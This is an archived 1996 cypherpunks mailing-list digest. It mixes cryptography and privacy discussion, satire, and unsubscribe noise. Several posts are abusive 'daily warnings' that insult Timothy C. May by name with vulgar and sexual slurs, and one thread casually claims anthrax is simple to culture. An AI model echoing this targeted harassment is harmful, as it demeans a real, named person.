Sep 1996 07:08:08 -0700 >From: Troy Varange >Message-Id: <199609181408.AA21359 at crl11.crl.com> >Subject: Fuckhead >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >Date: Wed, 18 Sep 1996 07:08:08 -0700 (PDT) >Priority: Fuckhead >Precedence: Fuckhead >Reply-To: dlv at bwalk.dm.com >In-Reply-To: >X-Mailer: ELM [version 2.4 PL23] >Mime-Version: 1.0 >Content-Type: text/plain; charset=US-ASCII >Content-Transfer-Encoding: 7bit >Content-Length: 10 > >Fuckhead. > From dlv at bwalk.dm.com Wed Sep 18 22:05:14 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 13:05:14 +0800 Subject: A daily warning regarding Timothy C. May In-Reply-To: Message-ID: Sandy Sandfort writes: > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > SANDY SANDFORT > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > C'punks, > > On Wed, 18 Sep 1996, Anonymous wrote: > > > Timothy C. May is a lying sack of shit. > > I've never known Tim to lie. I agree with Anon - Timmy (fart) is a lying sack of shit. I caught him "complaining" to various people in the computer security industry about what I write on the 'net - and he attributes shit to me that I knows I never wrote. That's lie #1. When confronted with evidence, Timmy further lied about his communication with one of these people. He's a sad piece of work. > Back under your rock, anonymous. Yes - please, don't send a *daily* Timmy shit to this mailing list. This used to be a good forum to discuss crypto. Timmy doesn't know much about crypto, so he's been spamming it with his libertarian crap. Please don't contribute more shit than we already get from Timmy. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From /dev/null at dhp.com Wed Sep 18 22:21:52 1996 From: /dev/null at dhp.com (Anonymous) Date: Thu, 19 Sep 1996 13:21:52 +0800 Subject: The daily warning about Timothy May, the ignorant buffoon Message-ID: <199609190246.WAA07624@dhp.com> Timothy May is widely recognized on the net, because of his frequent vitriolic postings, as someone/thing ready to cut off his own penis to spite the testicles, although his few real-world friends recognize him better from the rear. From wb8foz at nrk.com Wed Sep 18 22:31:12 1996 From: wb8foz at nrk.com (David Lesher) Date: Thu, 19 Sep 1996 13:31:12 +0800 Subject: Mercenaries In-Reply-To: Message-ID: <199609190334.XAA30084@nrk.com> Timothy C. May sez: > > As to Michelle's point that Americans cannot serve for pay in other > militaries, there are all sorts of waivers and "look the other way"s > involved. For example, the retired American officer who became the top > military man in Estonia (or one of the Baltic States)--while still > retaining his U.S. citizenship. But at the loss of his pension, as I recall. > Israel is one of several states which the U.S. allows dual citizenship > with. Not true at all. Read Rich Wales Dual-Cit FAQ. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From paul at fatmans.demon.co.uk Wed Sep 18 22:50:24 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Thu, 19 Sep 1996 13:50:24 +0800 Subject: OTP seed solution? - strong, tried before??? Message-ID: <842976406.25087.0@fatmans.demon.co.uk> A very simple idea came to me today that I`m sure has been done before and I wanted to find out if it has any problems I haven`t seen: A strong random generator (ie. a BBS) is seeded with a true random seed (derived possibly from keyboard latency) and used each time a message is send to create a message length randon string. This string is XOR`d or added to the message creating a OTP. The recipient has previously been sent a seed value for the generator encrypted under say RSA and signed to prevent a man in the middle attack. Each set of recipient<->sender pairs has a seed unique to them. This seems good to me but the key distribution mess (ie. hundreds of keys about) is the big problem, has anyone done any research into possible solutions to this??? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/ 9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90 En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2 YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi mUqFH41Z7NkyO8ZFdi5GGX0= =CMZA -----END PGP PUBLIC KEY BLOCK----- From Adamsc at io-online.com Wed Sep 18 23:02:02 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 14:02:02 +0800 Subject: XPA_nix Message-ID: <19960919034825859.AAA177@GIGANTE> On Wed, 18 Sep 1996 12:22:10 -0400, Perry E. Metzger wrote: >> > Cheswick opines,"This is the first major attack of a kind that I believe to >> > be the final Internet security problem." >> Harrumph. We should only BE so lucky. >I don't remember if Ches was quoted correctly, but its more or less >true -- we know how to deal with most classes of major problems, but >denial of service is still a major question mark. I suspect its the >last big frontier. Hopefully it will die out if things ever switch over to a digicash payment scheme. Then only the big guys would mess with it... # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From asgaard at Cor.sos.sll.se Wed Sep 18 23:06:45 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Thu, 19 Sep 1996 14:06:45 +0800 Subject: The Near-Necessity of Health Insurance In-Reply-To: <01I9MKL4PCX48Y4YUZ@mbcl.rutgers.edu> Message-ID: On Wed, 18 Sep 1996, E. Allen Smith wrote: > While this is certainly your business, I would suggest at least >one physical a year, including blood work, as a good preventative measure... >I believe it _has_ been shown to extend lives; I can do a Medline lookup if >desired. Save yourself the trouble. To _show_ such a thing one would have to: 1) get some 10.000 persons, chosen 'randomly' (at least not chosen when they have already consulted medical proffessionals) to willingly participate in the study and accept whatever group they would be coin-tossed into 2) randomize them into two groups of 5000 each 3) have one group checked anually and the other group not checked 4) wait 20-50 years 5) compare the groups for mortality Without consulting Medline I can tell you that such a study has not and will never be done. And all other approaches to try to prove such a thing could be heavily criticized for likely bias. Health tests, especially 'blood work', are done for profit, with very little, if anything at all, to gain for the subjects. (There are a few possible exceptions, f ex PAP-smears. Blood pressure is more doubtful and cholesterol is a joke. But I'm not going to argue on the details in this forum.) Asgaard From barrk at alias.cyberpass.net Thu Sep 19 14:22:58 1996 From: barrk at alias.cyberpass.net (Barry K.) Date: Thu, 19 Sep 1996 14:22:58 -0700 (PDT) Subject: Bernstein hearing reminder: [..] Message-ID: <199609192042.NAA16104@sirius.infonex.com> Part 1 The Batman part On Sep 19, 9:24am, Batman wrote: > Subject: RE: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal B >For the 200th time, unsubscrive me of your fucked mail lists. > >-- End of excerpt from Batman Part 2 James wrote: >Apologies if you receive more than one copy of this message, but >I'm auto-replying to your message to handle the flood: I had only one copy, James, but it was good. >Redistribution to the list from which you originally received >the problem message is kindly requested. Which list was that, James? >Thank you for bringing this matter to our attention. The email >or posting you have seen falsely represents Smith Barney and its >employees. These are erroneous postings that did not originate >from anyone employed by our firm, and therefore we cannot >directly stop them from occurring. However we have advised the >companies we believe to have serviced the originator of these >messages and we are pursuing all possible steps to end this >fraud. Unfortunately some people abuse the Internet and we >regret any inconvenience they may have caused you. Thats good, James. As the FBI man said: I smelled a rat and I nipped it in the bud. >There are currently no mailing lists maintained in the smb.com >domain, so you were not subscribed to any list. If you receive >any further messages of this nature, they are the product of the >same spurious source. Thats the word. Spuvious. >We're sorry for any inconvenience you may have experienced as a >result of this unfortunate abuse of the 'Net. No inconvenience, James. No inconvenience, at all. >Further queries via email to postmaster at smb.com please. Direct your replies to: cypherpunks-announce at toad.com This list is a must for all people in the Arctic, the plains of Mongolia and the North West territories, who want to be kept "ajour" of the dressinghabits of the natives in California. Barry From dsmith at prairienet.org Wed Sep 18 23:31:18 1996 From: dsmith at prairienet.org (David E. Smith) Date: Thu, 19 Sep 1996 14:31:18 +0800 Subject: a simple cypher scheme Message-ID: <199609190415.XAA08538@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: sjohnson at packetengines.com, cypherpunks at toad.com Date: Wed Sep 18 23:06:32 1996 > i've been on cypherpunks for about a year a half now, and have > wacthed > many interesting threads pass by but i've never posited anything. what > has > brought me out into the open is this : i work for an engineering firm > doing > asic design, i use pgp ( as do all rational persons ), a co-worker here > has > come up with a 'cypher' scheme that he would like to use to send code to > our > clients. the scheme is this : he would take the file of code and pad > all > lines to the length of the longest line, he would then preform column > swaps, > and then row swaps, to 'mix up' the file. the person receiving the file > would then preform the opposite functions to recover the file. it seems > so > simple that it can't be good. i've convenced him to use pgp, but i > would > like some input if possible on why his cypher scheme is not a good one. > > thanx > Okay... well, in order to undo whatever was done (the column swaps and row swaps, and the pads), the formula has to be transmitted. Assuming that someone can intercept that as well as the alleged cyphertext, it's no-good. It's the whole "secure channel" issue. (Also, some information would have to be attached to the file containing the orignial end-of-lines for each line, or the padding will be difficult to tell from the legitimate code.) dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "The world's at stake. Don't confuse me with details." -- Captain America, "Onslaught" ... famous last words -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMkDGyzVTwUKWHSsJAQHD3Af9H+Vq4qFnv9JWPY0E7x8zuXM4Om3zGZ2O sQYKOR/zAZ6qXLA8a9/C//yMPzRIVf0msd/fytt1PDB+Ei2t7+87EIOjETEwGtOp hmpioj0IUkYwxAvVV7Ihmw+6bxKCGPolxHekPyjfdI58eZt/aAzh8tcS9X4htxGH DzgKBm/OEZwMa1PulRWYQdDQmQCN9Cgno87RJn+e1kvE8wgrhYaLy5TOZKl99Vpb LgXj+CAbMm7WkXZT52scIX/hkcjbMxIEilYX7HfdIFKg7yv3O9ioeba14szafqPd KOU2DNL1rLA+yHUm0jnNQ6SugnMHRey5/hRq2XSBAyaK4IRagCkslw== =g6AI -----END PGP SIGNATURE----- From geeman at best.com Wed Sep 18 23:35:54 1996 From: geeman at best.com (geeman at best.com) Date: Thu, 19 Sep 1996 14:35:54 +0800 Subject: SPAMS Message-ID: <01BBA5A9.802E61C0@geeman.vip.best.com> ANY EMAIL ADDRESS PUBLISHED ON THE INTERNET THAT INVITES COMMERCIAL SOLICITATIONS IS DEEMED AS A COMMERCIAL ADDRESS, AND AS SUCH IS ELIGABLE FOR ETHICAL AND LEGAL EMAIL SOLICITATIONS FROM DIRECT ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ aye: there's the rub. and: don't trust anyone who can't spell. ELECTRONIC MAIL MARKETERS. IF FOR ANY REASON YOU OBJECT TO RECEIVING THIS MESSAGE PLEASE POLITELY REQUEST REMOVAL FROM MY LIST BY CLICKING ON THE REPLY BUTTON AND ENTERING "REMOVE" IN THE SUBJECT LINE. IF YOU DO NOT DO SO, I MUST ASSUME YOU WISH TO RECEIVE FURTHER MAILINGS. From tcmay at got.net Wed Sep 18 23:37:32 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 14:37:32 +0800 Subject: GAK, GAP, GAY Message-ID: At 12:49 AM 9/19/96, Rabid Wombat wrote: >Don't get me wrong - I'm not disagreeing with you about how grim your >points are. I just wanted to point out that information "could" be >released to researchers without identifying the patient - researchers are >generally interested in statistical data, such as the incidence of cancer >per zip code, etc., which doesn't require your name to be released. Zip >codes are sufficiently populated that this probably is of no danger to >privacy. Fine, if they can convince me that of this, I may consent to letting them in on my secrets. I surmise that asking permission of patients is not part of the plan, though. Secondly--and this is actually a crypto-related point (!)--it does not take much "blinded information" to figure out the correlations between patients and data. It obviously depends on the amount of information, but it's possible. (Recall similar arguments about the census data being sold to direct marketers: even with blinding of names, correlation was trivial in many cases. This caused even more people to simply state the number of (putative) living beings at their address and to "respectfully decline" to answer the detailed questions about racial makeup ("Mein Censusfuhrer, ich bin Aryan!"), income levels, diseases,insurance, employer, number of televisions, etc.) >OTOH, the potential for mis-use of such records is high, and allowing >access to a huge number of commercial sites, and their employees, >certainly opens a lot of holes. It will be a zoo. Tens of thousands of people will have access to one's records, and there will be no pretense that the system has even Clipper-like levels of protection. A psychotherapist acquaintance of mine is so worried about _existing_ lapses in patient-therapist confidentiality (basically, insurance companies are demanding detailed summaries of diagnoses and treatments, and demanding that he give them reports before they will pay...further evidence that those seeking treatment ought to pay cash and not have insurance companies in the loop on this sort of thing) that he has become and advocate of using PGP. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From unicorn at schloss.li Wed Sep 18 23:51:10 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 19 Sep 1996 14:51:10 +0800 Subject: SSN database scam? In-Reply-To: <2.2.32.19960918141242.006e9b48@super.zippo.com> Message-ID: On Wed, 18 Sep 1996, Jim Byrd wrote: > At 01:22 PM 9/18/96 +0200, Gary Howland forwarded: > >Forwarded from www-security mailing list. > [snip] > > >Can anybody comment on the item forwarded below my sig file? It claims > >there's a database w/ people's credit card no's etc on it and you have to > >give your name and social security number to get off of it. This strikes > >me as being a scam to get your ssn, but this went around at work and > >people are actually calling and giving it out. I know ssn's aren't really > >as secure as they're supposed to be, but still... > > I happen to work for Lexis-Nexis, but I don't speak for the company. Yes, > P-Trak is real, it was recently made available to our customers. > > It is NOT a scam to get SSNs. Lexis-Nexis is a large and reputable company, > best-known for its huge legal database system, Lexis. The Nexis side has > news reports from a large variety of sources. > > P-Trak originally made SSNs available, but Lexis-Nexis removed this feature > in response to protests. Is your information listed in the Lexis-Nexis database? > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From zinc at zifi.genetics.utah.edu Wed Sep 18 23:53:51 1996 From: zinc at zifi.genetics.utah.edu (zinc) Date: Thu, 19 Sep 1996 14:53:51 +0800 Subject: cfs users group dead? Message-ID: <199609190426.WAA20012@zifi.genetics.utah.edu> -----BEGIN PGP SIGNED MESSAGE----- hi, is the cfs-users at big.att.com list dead? i haven't seen anything for some time and mail i sent just bounced with a bad error. actually, i just got another one. two-for-one bounces if you mail through the cfs-users list! thanks for any info, - -patrick finerty - -- "Those that give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -- Benjamin Franklin (1773) finger for PGP key zifi runs LINUX 2.0.20 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBMkDLdE3Qo/lG0AH5AQEOxAP+ONckRPOAstOQDroZQcSg+p4nP/OoctNw fRV+0FvUcUmjaJLe8ziGGSFJK36gnrWTCrfHsoF1BhRoMIoLEuHoRKNiPgrO88HN FWlWUUJ5Chj84jkLPstHIVAeOPS8RF71okvaWtarqXS6BCFgOByu7PD52VAMD/P4 aE9V2CAjNq8= =DG+6 -----END PGP SIGNATURE----- From mclow at owl.csusm.edu Wed Sep 18 23:59:20 1996 From: mclow at owl.csusm.edu (Marshall Clow) Date: Thu, 19 Sep 1996 14:59:20 +0800 Subject: GAK, GAP, GAY In-Reply-To: Message-ID: Rabit Wombat wrote: >Don't get me wrong - I'm not disagreeing with you about how grim your >points are. I just wanted to point out that information "could" be >released to researchers without identifying the patient - researchers are >generally interested in statistical data, such as the incidence of cancer >per zip code, etc., which doesn't require your name to be released. Zip >codes are sufficiently populated that this probably is of no danger to >privacy. > Um..... Zip code 92067-1234 is my mother's mailing address. OK, it's not -1234, but there is a 9 digit zip code that is sufficient to get mail to my mother, and my mother alone. P.S. This is less than 5 miles outside the city limits of San Diego; hardly a "low population density" area. -- Marshall Marshall Clow Aladdin Systems "We're not gonna take it/Never did and never will We're not gonna take it/Gonna break it, gonna shake it, let's forget it better still" -- The Who, "Tommy" From frantz at netcom.com Thu Sep 19 00:05:21 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 19 Sep 1996 15:05:21 +0800 Subject: Fear of Flying -- from HotWired Message-ID: <199609190446.VAA04571@netcom8.netcom.com> At 2:51 PM 9/18/96 -0400, Black Unicorn wrote: >On Wed, 18 Sep 1996, Bill Frantz wrote: > >> At 1:21 AM 9/18/96 -0400, Black Unicorn wrote: >> >> On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote: >> >> >Gee, biotech has come a long way. Now I can download the Anthrax DNA >> >> >sequence from the net and insert it in some carrier bacteria and start >> >> >making Anthrax bacteria. Neat! >> > >> >Culturing and growing anthrax is painfully simple. No DNA required. >> >> Sorry Unicorn, you missed my point. (1) You need DNA to grow bacteria. >> You can get the DNA two ways. (A) You get a sample of the beast, or (B) >> You get a DNA sequence and then regenerate the DNA. (I don't think B is >> technically feasable yet.) (2) You can't send samples of the beast thru >> the net. > >I think your point was that the net was not responsible for the >proliferation of Anthrax development data. (Am I wrong?) My point was that you need more than just information (but see below). You also need some materials that may be hard to get. Being totally ignorant in the anthrax growing area, I have no idea where I would get my starter bacteria. (Presumably any net-info would tell me. I haven't looked.) At 12:34 PM 9/18/96 -0800, Jim McCoy wrote: >Yes, B is possible. At the moment the devices only work for relatively >small sequences but this is improving and the current generation should be >able to handle a constructing a bacteria sequence pretty well... Ergo >you _can_ send samples of the beast through the net (or at least genetic >clones.) Oh well, if not this year, then next people will be able to down load any virus/bacteria they want. Come the millennium, it will be plants, with mice and rats to follow. Black Unicorn wrote: >My point was that in the eyes of the "leaders" all that is required to >make the net responsible for the proliferation is for the process to be >describeable in a simple one or two page set of instructions (such as >Anthrax is). I have no problem with your point. Mine was intended as sarcasm. ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From mab at research.att.com Thu Sep 19 00:12:45 1996 From: mab at research.att.com (Matt Blaze) Date: Thu, 19 Sep 1996 15:12:45 +0800 Subject: cfs users group dead? In-Reply-To: <199609190426.WAA20012@zifi.genetics.utah.edu> Message-ID: <199609190504.BAA00599@nsa.research.att.com> >is the cfs-users at big.att.com list dead? i haven't seen anything for >some time and mail i sent just bounced with a bad error. actually, i >just got another one. two-for-one bounces if you mail through the >cfs-users list! > >thanks for any info, > >- -patrick finerty Yes, it seems to be. It runs on a machine that is no longer in my office, and may have gotten mis-configured when the AT&T breakup happened. I'll check it out (but not for at least a week; unfortunately I'll be out of the office 'till then). -matt From craigw at dg.ce.com.au Thu Sep 19 00:16:46 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Thu, 19 Sep 1996 15:16:46 +0800 Subject: Banking over the net Message-ID: <199609190520.PAA18516@mac.ce.com.au> For some time several Australian Banks have been interested in setting up online banking via the web. Currently the Commonwealth Bank does have online banking, but on non-internetworked servers. This requires an encrypted password. Currently this involves logging into the bank server directly transfering the password, at which case the user has access to their accounts. The unfortunate details are that the instructions for the account are not sent encrypted. Apart from the initial password, all data is sent plain text. There is likely to be implemented an inital web trial of this service in December this year. Hopefully the security will be upgraded a little. Where this is not likely is that the likely canditate for encryption over the net is going to be 40bit netscape (as what bank wants to go against the wishes of the US gov). The banks feel secure in that they are providing a 128bit secured password to the customer via mail. This seems to be the end of the security. While the average member of the public blindly trusts the banks to keep them safe, and untill there is a user friendly means of encrypting data (that the US government supports), I can see alot of room for fraud. ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From attila at primenet.com Thu Sep 19 00:21:52 1996 From: attila at primenet.com (attila) Date: Thu, 19 Sep 1996 15:21:52 +0800 Subject: No Subject Message-ID: <199609190531.XAA10513@InfoWest.COM> Mike Farrell, actor and longtime opponent of the death penalty: "We don't rape rapists, we don't burn arsonists, why should we kill killers?" well, come to thing of it, why don't we let a bull rape a rapist? or burn an arsonist at the stake? seems fair to me. maybe even sell tickets to pay for the cost. -- one of the few things we all share: the utter, corrosive contempt for our elected officials. -- Politicians are like diapers. They both need changing regularly, and for the same reason. From unicorn at schloss.li Thu Sep 19 00:26:50 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 19 Sep 1996 15:26:50 +0800 Subject: Stinger Specs Message-ID: Stinger (AIM-92) (Jane's #: 6604.331) 152 x 7-14 cm (l x d - span) Weight: 18 kg Warhead: HE Propulsion: Solid Range: 2-4 km Guidance: IR Exact effective range / altitude is not listed in the quick guide I have on my desk. I will pull it out of a larger volume when I have time. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From lucifer at dhp.com Thu Sep 19 00:28:16 1996 From: lucifer at dhp.com (Mixmaster) Date: Thu, 19 Sep 1996 15:28:16 +0800 Subject: Cypherpunk Enquirer [NOISE] Message-ID: <199609190441.AAA12078@dhp.com> THE CYPHERPUNK ENQUIRER "Encyphering minds want to know." The EFF announced an agreement with the Clinton administration that will "guarantee Americans rights to privacy and anonymity on the Internet for the forseeable future". The agreement, which includes unspecified concessions by the President on matters of encryption, privacy, and the export of encryption programs, is to be signed today in the White House Rose Garden. An EFF official, who wished to remain anonymous, chortled, "We got basically what we wanted, and all we had to do was give up Czechoslovakia." Cellular One today announced the signing of noted Cypherpunk Tim May as their official Internet spokesperson. Mr. May will be filming a series of commercials featuring himself in a hot tub calling a variety of 1-900 numbers on a cellular phone, while a voice-over by Cellular One executives extoles their recently announced 'Geek Plan', featuring free calls during computer hacker's normal waking hours of 7pm to 7am, with all calls to pizza parlors for delivery half-price for the first year. The commercials, the first to be filmed entirely in the 'quick-time' format, should be appearing on commercial web pages within the month. The Cypherpunk Academy of Codes and Cyphers has announced the first official offshoot of the Cypherpunks list. The Junior Auxillary, anchored by the new mailing list cyphertots at juno.com, will give budding hackers the chance to get out of the house and hear famous Cypherpunks like Bill Stewart and Robert Hettinga lecture on topics such as "The Port 25 Hack - Fact or Fiction", "Hacking the Transmitter on Your Ankle Bracelet", and "SPAM - Cypherbabes are Impressed by a REALLY BIG One." To join, send a message with the body "subscribe cyphertots" to majordomo at cybercrime.fbi.gov. (note to juno.com - we don't do personals) In related news, John Young will be tutoring Dr. Dimitri Vulis in English as a Second Language. Scientists flocked to toad.com recently in response to the first authenticated sighting of a Perrygram in months. The Perrygram, only recently thought extinct, was spotted on the cypherpunks mailing list after an absence of several months. Specialists speculate that it may have detected the recent list increase in its favorite food - pure, unadulterated bullshit. The Reputation Capital markets remained in a deep slump after the recent closings of alpha.c2.org and anon.penet. Analysists estimate the loss in over 1 billion in reputation capital, with the effect spilling over to the rest of the market. Since the loss of anon.penet, Black Unicorn is down 12 5/8, Atilla down 4 3/4 to 8 1/2, Jim Ray is down 10, and Tim May, as usual, is being investigated by the Blacknet Securities and Exchange Commission for his timely shorting of Lucky Green. Novell President Joe Marengi announced today that Novell would begin bundling Microsoft's Internet Explorer with Novell Netware in the third quarter. In return, Microsoft announced plans to release his 8 year old daughter Suzanne unharmed. Next in the Enquirer: HIDE THE KIDS! FIRE UP SURFWATCH! Sandy Sandfort's latest party - WE HAVE MPEGS! From unicorn at schloss.li Thu Sep 19 00:45:09 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 19 Sep 1996 15:45:09 +0800 Subject: Fear of Flying -- from HotWired In-Reply-To: <199609190446.VAA04571@netcom8.netcom.com> Message-ID: On Wed, 18 Sep 1996, Bill Frantz wrote: [...] > Black Unicorn wrote: > >My point was that in the eyes of the "leaders" all that is required to > >make the net responsible for the proliferation is for the process to be > >describeable in a simple one or two page set of instructions (such as > >Anthrax is). > > I have no problem with your point. Mine was intended as sarcasm. I can be sarcasm impaired. Sorry. > > > ------------------------------------------------------------------------- > Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting > (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. > frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA > > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From flatline at direct.ca Thu Sep 19 16:04:58 1996 From: flatline at direct.ca (Der Fuhrer of SS) Date: Thu, 19 Sep 1996 16:04:58 -0700 (PDT) Subject: unsubscribe Message-ID: <96Sep19.160455-0700pdt.30137-25649+333@orb.direct.ca> unsubscribe From nobody at flame.alias.net Thu Sep 19 01:05:30 1996 From: nobody at flame.alias.net (Anonymous) Date: Thu, 19 Sep 1996 16:05:30 +0800 Subject: The periodic caveat about Timmy May Message-ID: <199609190517.HAA00851@basement.replay.com> Timmy May habitually digs into his cesspool of a mind for his mailing list fertilizer. From mycroft at actrix.gen.nz Thu Sep 19 01:11:52 1996 From: mycroft at actrix.gen.nz (Paul Foley) Date: Thu, 19 Sep 1996 16:11:52 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609152344.RAA15298@InfoWest.COM> Message-ID: <199609190346.PAA01360@mycroft.actrix.gen.nz> On Sun, 15 Sep 96 23:43:33 +0000, attila wrote: Now, I don't intend to be Scrooge, but I'll fight for my rights to cut off at the knees the knee-jerk liberals and government slavemeisters who want to tell me that I, and 2 others are required to support 100 freeloaders. Two others, huh? Lucky you :-) >From somewhere (i.e. I didn't write it and I don't know who did): I'm tired. Yes, I'm tired. For several years I've been blaming it on middle age, poor blood, lack of vitamins, air pollution, saccharin, obesity, dieting, under-arm odour, yellow wax buildup and another dozen maladies that make you wonder if life is really worth living. But I found out it ain't that. I'm tired because I'm overworked. The population of this country is 3.3 million, 0.5 million are retired, that leaves 2.8 million to do the work. There are 1 million in school, that leaves 1.8 million to do the work. 200,000 are unemployed and 400,000 are employed by the Government, that leaves 1.2 million to do the work. 300,000 are employed by City and Borough Councils, leaving 700,000 to do the work. There are 420,000 people in hospital and 279,998 in prison. That leaves two people to do the work. You and me. And you are sitting on your arse reading this. No wonder I'm bloody tired. -- Paul Foley --- PGPmail preferred PGP key ID 0x1CA3386D available from keyservers fingerprint = 4A 76 83 D8 99 BC ED 33 C5 02 81 C9 BF 7A 91 E8 ---------------------------------------------------------------------- There is nothing wrong with Southern California that a rise in the ocean level wouldn't cure. -- Ross MacDonald From asgaard at Cor.sos.sll.se Thu Sep 19 01:15:51 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Thu, 19 Sep 1996 16:15:51 +0800 Subject: GAK, GAP, GAY In-Reply-To: Message-ID: On Wed, 18 Sep 1996, Timothy C. May wrote: > On a related note, I read an article yesterday about the proposed new > Health Data Base, with all encounters with any medical institution or any > health care provider of any sort being cross-linked and cross-referenced. Scary. The benefits for the singular patient would be very marginal. Epidemiologic research would become easier, with lots of opportunities for the publish-or-perish academic medical crowd, but we already know that smoking etc is bad for us. The real agenda is of course to make life easier for the insurance business, our would-be employers and the State. > the master index was born....Only people with a 'security ticket'--such as > doctors, insurers, scientific researchers or police with a proper > warrant--are supposed to be able to see the clinical details....Kathy Ganz, > director of the New Mexico Health Policy Commission, said, "Rights to > privacy are genuine concerns, but they will need to be balanced against > notions of common good." The specialized software industry is currently flooding the medical community with applications for all sorts of patient-related info. It started with the small units (offices, with a single or a handful doctors etc), which are already doing a lot of their record-keeping on digital media, often with lousy security. Now the turn has come to the big hospitals, which need heavily customized implementations of the basic product they will choose. Athough most serious products have proper authentication routines (including smartcards; especially nurses seem to be totally unable to handle passwords above the my_cat's_name level), the overall availability of patient data will rise enormously with digital storage. The trend in the US is for large companies to take over more and more of the big hospitals (in Sweden almost all hospitals are owned by the 'public', with a trend towards bigger and bigger integrated 'regions') mandating larger and larger databases. So even without an outspoken decision the Grand National Health Database is worming itself upon us. > Pretty chilling, eh? As we all know, once such medical, dietary, and > genetic data bases 